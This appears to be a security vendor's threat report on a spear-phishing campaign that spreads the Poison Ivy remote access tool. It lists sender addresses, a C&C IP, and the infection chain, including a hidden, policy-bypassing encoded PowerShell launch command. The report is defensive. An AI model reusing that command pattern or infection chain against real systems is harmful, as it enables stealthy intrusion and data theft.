FreeHosting APT PowerSploit Poison Ivy Continues to Spread

FreeHosting APT PowerSploit Poison Ivy is a mouthful indeed. The “APT” part in the name stands for Advanced Persistent Threat. The “PowerSploit” points to Microsoft PowerShell scripts that are used for the attack. Finally, “Poison Ivy” represents a highly researched, well-documented remote access tool (RAT) that has been around for a decade now. The combination of all of these names defines a spear-phishing attack that has been successfully employed to expose people to phishing emails carrying corrupted attachments and links that are meant to help with the attacks of Poison Ivy. In this report, we discuss the nitty-gritty of this dangerous malware, and, hopefully, the information we provide will help you protect yourself against it. If you are interested in this, continue reading.

The success of FreeHosting APT PowerSploit Poison Ivy attacks depends on a stealthy scam that pushes gullible users into opening a fake Microsoft Word document. First, the attackers obtain a list of real email addresses. These could be accumulated during a phishing scam created by the actors themselves. For example, they could use an adware server to push misleading surveys or prize giveaways to collect this data. They could also buy emails from third parties. If you do not want your email address to be recorded by a malicious party, be very cautious about how and where you disclose it. Keep in mind that less reliable services can sell it or share it without your knowledge. Once cyber criminals have the list of legitimate email addresses, they can start the FreeHosting APT PowerSploit Poison attack.

The message created by FreeHosting APT PowerSploit Poison Ivy creators is meant to be highly attractive, and so the subject line and the message are meant to trick you. So far, two unique email addresses (wisers.data@gmail.com and health.pro.demo30@gmail.com) were found to send these phishing emails. Unfortunately, the message inside is meant to trick you into clicking a download link that is associated with a VBScript encoded script. According to our research, malware is stored on geocities.jp, which provides free hosting services. If the link is clicked, the VBScript then executes the “powershell.exe -w hidden -ep bypass -Enc "encoded message"” command. The script downloads and executes a file named “Meeting_summary.doc.” Based on the name, it is most likely that FreeHosting APT PowerSploit Poison Ivy phishing emails are targeted at businesses, companies, governments, and organizations, whose employees use email as the primary source of communication.

The “Meeting_summary.doc” file opens a document that downloads a PowerShell script, which is also encoded, just like the VBScript. A fake process called “userinit.exe” is created. A shellcode is injected into the .exe file, and the malicious Poison Ivy is injected. Userinit.exe is also responsible for connecting to a C&C server (IP address is 61.97.243.15) and sending such information as the version of the operating system, the architecture and the number of the processor, as well as system variables. As you can see, FreeHosting APT PowerSploit Poison Ivy relies on malicious code and script, and it is basically a fileless infection. Due to this, it is not possible to remove it per se. If the code is executed, it allows remote attackers to access and, possibly, control the infected system remotely. The distribution and execution of Poison Ivy are incredibly stealthy processes, and, unfortunately, the victims might not recognize the attack even when it is in full swing.

While you cannot do much once FreeHosting APT PowerSploit Poison Ivy malware attack is executed, there are ways to protect yourself against it. Most important, do not open spam emails and the links and attachments sent via them. What if the subject line is misleading? You have to be vigilant, and even if it says something like “meeting information,” you can suspect a scam if the sender is unfamiliar to you. If you ever have doubts, consult with the virtual security expert in your office. If you have no one to consult with, always remember that it is best to ignore unfamiliar senders and random emails with information that does not make sense. If you did not plan any meetings, why would you open an email, allegedly, providing you with more information about them? Caution is important, but, in some cases, it is not enough. Do not forget to implement reliable anti-malware software that could detect and warn you about suspicious activity.